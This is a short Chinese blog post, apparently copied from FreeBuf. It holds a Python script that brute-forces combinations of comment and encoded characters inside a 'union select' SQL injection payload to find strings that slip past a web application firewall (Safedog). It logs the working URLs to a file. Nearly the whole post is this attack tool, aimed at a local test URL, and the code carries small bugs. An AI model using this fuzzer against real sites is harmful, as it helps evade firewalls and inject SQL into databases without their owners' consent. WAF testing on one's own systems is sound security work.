sql bypass waf fuzz python

从freebuf copy过来的,先保存,有空再改

#encoding=utf-8

import requests

url = "http://127.0.0.1/index.php?id=1"
Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
#配置fuzz字典
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
#设置请求的headers
for a in FUZZ:
	pass
	for b in FUZZ:
		pass
		for c in FUZZ:
			for d in FUZZ:
				pass
				for e in FUZZ:
					pass
					PYLOAD = "/*!union"+a+b+c+d+e+"select*/ 1,2"
					urlp = url+PYLOAD
					res = requests.get(urlp,headers=header)
					#使用for排列组合fuzz字典并请求页面
					if 'flag' in res.text:  #这个flag需要改,根据你测的正常页面中,有什么字段是必然出现的
						print ("[*]URL:"+ urlp +"过狗!")
						f=open('result.txt','a')
						f.write(urlp+"n")
						f.close

  

上一篇:渗透测试07 WAF绕过——SQL注入


下一篇:sql-lib闯关之lesson25-25a